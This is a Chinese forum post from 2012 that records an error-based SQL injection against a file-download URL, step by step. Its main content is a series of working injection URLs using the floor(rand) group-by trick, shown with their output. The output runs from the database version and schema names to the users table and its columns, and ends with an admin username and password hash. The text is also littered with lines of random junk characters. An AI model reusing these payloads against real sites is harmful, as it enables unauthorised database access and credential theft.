http://www.wooyun.org/bugs/wooyun-2010-01666% q9 |+ ?0 Y+ E% h. s
2 t4 ^) q+ M. X" w0 d3 O' S4 n
之前想找个测试 没想到这有 可以测试下做个记录而已
7 ^4 Z1 Q' t4 Z) e q3 A- h8 o* S! ]9 d: d
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003, S3 V, S" h, W4 q; x
. i" b \; V/ C5 e
/data0/htdocs/leqi_new/app/myapp.php; @7 w* ]( E0 n+ k1 p% Q$ I
8 ~+ f6 `8 b d: }0 n 或者
9 j+ [& n4 U: ~$ q' L7 u( @9 @0 \
/**********version()**********/ 5.1.49-log- R3 L4 W2 ~5 n7 @; r
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003. x6 }& o4 h& A3 c) [" O! V
2 }( I2 x, T. s2 f6 {- j
/**********user()**********/ ( s2 [+ R4 M4 G" u0 ]7 H. A. s
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
3 o1 z' R& w$ v& z/ d2 \/ v- M. J( \" Q9 E! C& M
/**********database()**********/ leqi
4 m' C: R! p: Bhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
7 m1 K9 m) `/ ?' C6 s. f9 A9 T ~/ ~ L7 ]- q! X8 s7 B
/**********limit依次递归爆库**********/
0 W; J+ W- u) Y# @8 Fhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003 c: |5 `3 J6 p- i% ]: i
information_schema8 t {+ H: |' Z! z$ a$ G6 E7 r
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003% a* _5 | u- k/ z# Q3 W0 Q
leqi/ [5 |' K, v5 M) o
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
8 A8 Q8 w$ Q9 \7 Otest
0 M. M6 o$ E) i( C ?: \
9 i1 |0 h2 p$ D6 j' \' B7 v/**********limit依次递归爆表名**********/5 e$ s/ T9 w- v1 G& V
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0035 e! C* I1 u. D0 C6 \+ l
users
; q& A |, ?' T# k) M* M( j) f3 u: U- a/ z9 D
/**********limit依次递归爆字段名**********/" ]$ N( n. f3 w) o1 I
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
5 v& d- |5 s2 z! [! Guser_id,username,nickname,passwd,group_id4 {1 s7 K) J' A: S7 d
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
$ |9 S, B5 L% r* b7 }# d3 \/wapc/5000_0005_003
- r; `) ~( T- ?& }9 a M2 P11 21% M" r0 C F7 H, i0 y( P* T
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%233 t; i% o& A( z$ j3 d
/wapc/5000_0005_003) N' Y' E( s9 M4 D/ G
11 341 351 361
# ^& z" D' P+ R% [/**********爆数据**********/; b" p T8 p# y
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23: f: L4 ^4 K5 p
admin0 K' }* R5 u* J+ h4 v* U1 I. Y
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%233 F, O5 D0 a7 O0 n- y8 }0 O
6a8b4574ca231eb8bd52764d4978ffcd: \) E: z" B( ~9 A5 B. |
/ `) b0 J |3 O' L0 ] ( }& E+ H a1 e! ?, l, K
|
发表于 2012-9-13 17:52:09
收藏
支持
反对